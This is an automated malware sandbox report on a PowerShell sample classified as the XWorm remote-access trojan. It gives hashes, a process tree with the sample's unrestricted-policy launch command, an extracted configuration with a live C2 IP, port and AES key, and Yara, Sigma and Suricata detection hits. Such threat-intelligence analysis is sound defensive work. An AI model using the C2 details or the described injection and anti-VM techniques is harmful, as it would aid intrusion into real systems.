Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QP2uO3eN2p.ps1

Overview

General Information

Sample name:QP2uO3eN2p.ps1
renamed because original name is a hash value
Original sample name:7dc08327ae721c3ecf12447901858457bf510dd7016838839a629f86d673b18b.ps1
Analysis ID:1577167
MD5:6d71ada719b48d770647e3e703cbbcfd
SHA1:bc2dd183895888c20057f165d3332e8ecf6a6ada
SHA256:7dc08327ae721c3ecf12447901858457bf510dd7016838839a629f86d673b18b
Tags:92-255-57-155ps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 5944 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 1056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 2272 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1056 -s 1876 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • wermgr.exe (PID: 6780 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5968" "2404" "2616" "2496" "0" "0" "2348" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000004.00000002.3156793312.0000000002C91000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x1d84:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x9f40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x1dd8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x9fe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x1e68:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xa108:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x1c20:$cnc4: POST / HTTP/1.1
    Process Memory Space: RegSvcs.exe PID: 1056JoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: RegSvcs.exe PID: 1056MALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x2654a:$s8: Win32_ComputerSystem
      • 0x265b7:$s8: Win32_ComputerSystem
      • 0x28beb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x28ca7:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x28d31:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x28ab9:$cnc4: POST / HTTP/1.1

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", ProcessId: 5968, ProcessName: powershell.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\QP2uO3eN2p.ps1", ProcessId: 5968, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-18T08:15:43.333388+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:15:57.158905+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:15:58.442835+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:11.015125+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:24.874899+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:28.597087+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:30.404357+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:31.044515+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:31.686005+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:32.036316+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:32.322472+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:33.044858+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:33.647092+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:33.838111+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:34.256991+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:34.448063+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:34.865787+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:35.056779+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:35.657782+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:35.848677+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:35.968423+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:36.081371+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:36.159529+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:36.456221+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:36.578467+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:36.767180+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:36.888806+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:37.064619+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:37.202971+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:37.428366+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:37.726486+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:37.960367+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:38.039017+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:38.404743+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:38.648316+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:38.839427+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:38.961338+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:39.607222+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:39.846527+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:40.756259+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:40.947965+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:41.671236+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:41.938130+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:42.275763+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:42.413501+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:42.604480+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:42.773737+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:43.873445+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:44.064574+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:46.591890+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:47.498676+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:48.112016+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:48.303350+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:48.360230+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:48.493884+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:49.669827+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:49.860846+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:50.026813+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:50.051921+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:50.325197+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:50.638151+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:51.119723+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:51.761498+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:51.944455+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:52.063076+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:52.445896+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:52.504580+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:52.624346+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:52.759401+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:53.137497+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:53.835046+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:54.049025+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:54.265643+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:54.360679+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:54.480016+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:54.670898+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:54.787278+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:56.216871+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:56.408744+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:56.645108+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:58.870137+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:59.061121+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:59.252049+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:59.668999+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:16:59.958951+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:00.273669+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:01.670112+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:01.861176+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:01.953980+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:02.694848+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:03.333935+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:04.482711+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:04.673767+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:04.987325+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:05.448644+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:05.739584+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:05.907966+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:06.051606+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:06.242553+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:07.181318+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:07.799701+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:07.993773+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:08.184853+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:10.232269+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:10.464187+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:10.500987+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:10.777535+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:10.936876+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:11.089830+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:11.376788+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:11.703615+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:11.931130+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:12.050423+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:12.164175+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:12.527439+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:13.043015+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:13.998166+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:14.157417+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:14.310149+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:14.428853+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:14.614964+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:14.734482+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:14.903163+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:15.022865+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:15.094349+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:16.248297+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:16.480188+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:16.612787+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:16.671147+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:16.909369+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:17.638767+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:17.875820+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:17.950173+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:18.108287+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:18.140650+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:18.299294+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:19.250639+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:19.849399+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:20.040239+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:20.459478+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:20.650444+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:20.813850+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:20.841668+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:20.962643+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:22.092071+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:22.283164+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:22.404575+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:22.756162+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:22.887452+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:22.948714+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:23.731041+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:23.922125+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:25.201488+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:25.392435+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:27.733469+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:27.952032+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:28.184035+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:28.263893+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:28.636091+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:28.826388+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:29.138146+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:29.602159+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:29.893022+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:30.084272+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:30.275333+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:30.941907+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:31.561427+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:31.811433+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:32.169078+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:32.466178+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:32.657055+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:32.888074+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:33.842355+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:33.985561+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:34.176810+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:34.344357+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:34.369268+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:34.487532+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:34.610002+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:34.772953+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:34.971946+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:35.814048+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:36.004018+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:36.298214+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:36.489312+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:36.584703+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:39.420306+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:39.613976+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:40.022119+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:40.319555+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:40.627225+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:41.780411+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:42.030027+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:42.654781+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:43.259093+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
      2024-12-18T08:17:45.764249+010028528701Malware Command and Control Activity Detected92.255.57.1554411192.168.2.849708TCP
